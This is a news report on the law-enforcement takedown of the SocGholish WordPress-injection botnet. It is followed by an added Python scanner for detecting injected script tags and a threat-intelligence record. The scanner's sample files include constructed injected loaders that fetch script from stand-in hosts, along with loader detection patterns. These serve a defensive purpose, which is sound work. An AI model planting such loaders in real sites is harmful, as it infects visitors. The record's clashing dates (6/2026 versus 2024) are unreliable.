Global Law Enforcement Disrupts SocGholish Malware Network in Major Cybercrime Takedown
An international law enforcement operation has dismantled a vast cybercriminal network linked to the SocGholish malware, disrupting a botnet used to distribute ransomware and other malicious payloads. The takedown, announced by Dutch police on June 18, was part of Operation Endgame, a global initiative targeting ransomware and cybercrime.
The SocGholish group, tracked by cybersecurity firm Proofpoint as TA569, compromised 15,000 legitimate WordPress websites, logging in with leaked credentials or otherwise breaking into them. The compromised sites were then used to serve malicious pop-ups that tricked visitors into downloading fake software updates, which infected their systems. Infected devices were enrolled in the SocGholish botnet, which was frequently leveraged by Evil Corp, a Russia-linked cybercrime syndicate responsible for high-profile attacks on governments, healthcare institutions, and enterprises.
The operation, conducted over a week, resulted in the seizure of 106 servers and domains tied to the malware and the remediation of infected websites. Authorities from the Netherlands (NHCTU), Canada (RCMP), Germany (BKA), and the U.S. (FBI) collaborated on the effort, with support from Europol, Eurojust, and private cybersecurity partners like Infoblox.
Maikel Rollman of the Dutch NHCTU stated that the action cut off cybercriminals’ access to infected systems, reducing the risk of further attacks on critical infrastructure. Dr. Renée Burton of Infoblox emphasized the threat’s broad reach, noting that SocGholish’s activities enabled other criminals to infiltrate networks.
Website owners were notified of the breaches and advised to update credentials and apply security patches to prevent reinfection. The operation marks the first phase of continued efforts to dismantle SocGholish’s infrastructure.
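The advice to site owners above covers credentials and patches but not how to find the injection itself. The following is an added example, not code from the report, the Dutch police, Proofpoint or Infoblox: a small triage scan a WordPress owner could run over theme and plugin files to flag script tags that load from hosts the owner never chose, plus inline scripts that build a script element at runtime. The allowlist, the file paths, the sample file contents and the indicator patterns are all constructed for the demonstration; the patterns are generic loader heuristics and are not claimed to be a SocGholish signature.

```python
"""Triage scan for injected <script> tags in a WordPress install.

Added example, not part of the news report or of any law-enforcement
tooling. It assumes an injection takes the form of a <script> tag
(src= or inline) added to theme/plugin PHP or HTML files. All paths,
hosts and sample file contents below are constructed for the demo.
"""
import re
from urllib.parse import urlparse

# Hosts the site owner legitimately loads scripts from (assumed allowlist).
ALLOWED_HOSTS = {"example-site.test", "cdnjs.cloudflare.com"}

SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.IGNORECASE)
INLINE_SCRIPT = re.compile(r"<script[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
# Generic loader indicators (runtime-built script tags, decoded strings, eval).
# Assumed heuristics for this demo, not a SocGholish signature.
SUSPICIOUS_INLINE = re.compile(
    r"(document\.createElement\s*\(\s*['\"]script['\"]\s*\)"
    r"|String\.fromCharCode|atob\s*\(|eval\s*\()",
    re.IGNORECASE,
)


def external_script_hosts(content):
    """Return hostnames of script src= URLs that are not in ALLOWED_HOSTS."""
    hosts = []
    for src in SCRIPT_SRC.findall(content):
        if src.startswith("//"):          # protocol-relative URL
            src = "https:" + src
        host = urlparse(src).hostname
        if host is None:                  # relative path: same-origin, treated as trusted
            continue
        if host.lower() not in ALLOWED_HOSTS:
            hosts.append(host.lower())
    return hosts


def suspicious_inline_scripts(content):
    """Return the first 80 chars of each inline <script> body that matches a loader indicator."""
    findings = []
    for body in INLINE_SCRIPT.findall(content):
        if SUSPICIOUS_INLINE.search(body):
            findings.append(body.strip()[:80])
    return findings


def scan_files(files):
    """files: dict of path -> file content. Returns a list of (path, kind, detail)."""
    findings = []
    for path, content in files.items():
        for host in external_script_hosts(content):
            findings.append((path, "external_script", host))
        for snippet in suspicious_inline_scripts(content):
            findings.append((path, "inline_loader", snippet))
    return findings


# Constructed sample: one benign CDN tag, one injected external loader,
# one inline loader that decodes its target at runtime, one clean file.
SAMPLE_FILES = {
    "wp-content/themes/site/footer.php": (
        "<footer>...</footer>\n"
        "<script src=\"https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js\"></script>\n"
        "<script src=\"//updates.not-a-real-cdn.test/loader.js\"></script>\n"
    ),
    "wp-content/themes/site/header.php": (
        "<script>var s=document.createElement('script');"
        "s.src=atob('aHR0cHM6Ly9leGFtcGxlLnRlc3Q=');document.head.appendChild(s);</script>\n"
    ),
    "wp-content/themes/site/index.php": "<script src=\"/wp-includes/js/app.js\"></script>\n",
}

if __name__ == "__main__":
    for path, kind, detail in scan_files(SAMPLE_FILES):
        print(f"{kind:16} {path}: {detail}")
```

On a real install the dict of files would be built by walking wp-content and wp-includes; every hit still needs a human to confirm it is not a plugin's own loader, and a clean scan does not prove the site is clean, which is why the credential rotation and patching the report recommends remain necessary regardless of the scan result.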
Source: https://www.infosecurity-magazine.com/news/operation-endgame-socgholish-evil/
Evil Corp TPRM report: https://www.rankiteo.com/company/evil-corp
"id": "evi1781864638",
"linkid": "evil-corp",
"type": "Cyber Attack",
"date": "6/2026",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"
{'affected_entities': [{'industry': 'various',
'location': 'global',
'name': 'WordPress website owners',
'type': 'websites'},
{'industry': 'public sector',
'location': 'global',
'name': 'Governments',
'type': 'organization'},
{'industry': 'healthcare',
'location': 'global',
'name': 'Healthcare institutions',
'type': 'organization'},
{'industry': 'various',
'location': 'global',
'name': 'Enterprises',
'type': 'organization'}],
'attack_vector': 'malicious pop-ups (fake software updates)',
'date_publicly_disclosed': '2024-06-18',
'description': 'An international law enforcement operation has dismantled a '
'vast cybercriminal network linked to the SocGholish malware, '
'disrupting a botnet used to distribute ransomware and other '
'malicious payloads. The takedown was part of Operation '
'Endgame, a global initiative targeting ransomware and '
'cybercrime.',
'impact': {'operational_impact': 'disruption of cybercriminal network access '
'to infected systems',
'systems_affected': '15,000 legitimate WordPress websites'},
'initial_access_broker': {'entry_point': 'compromised WordPress websites'},
'investigation_status': 'ongoing (first phase completed)',
'motivation': ['cybercrime', 'financial gain'],
'post_incident_analysis': {'corrective_actions': 'seizure of infrastructure, '
'remediation of infected '
'sites, security advisories',
'root_causes': 'exploitation of leaked credentials '
'or hacked WordPress websites'},
'recommendations': 'Update credentials and apply security patches to prevent '
'reinfection',
'references': [{'source': 'Dutch police (NHCTU)'},
{'source': 'Proofpoint (TA569)'},
{'source': 'Infoblox'}],
'response': {'containment_measures': 'seizure of 106 servers and domains, '
'remediation of infected websites',
'law_enforcement_notified': True,
'remediation_measures': 'website owners notified to update '
'credentials and apply security patches',
'third_party_assistance': ['Infoblox', 'Europol', 'Eurojust']},
'stakeholder_advisories': 'Website owners notified of breaches and advised on '
'security measures',
'threat_actor': ['SocGholish group (TA569)', 'Evil Corp'],
'title': 'Global Law Enforcement Disrupts SocGholish Malware Network in Major '
'Cybercrime Takedown',
'type': ['malware', 'botnet'],
'vulnerability_exploited': 'leaked credentials or hacked WordPress websites'}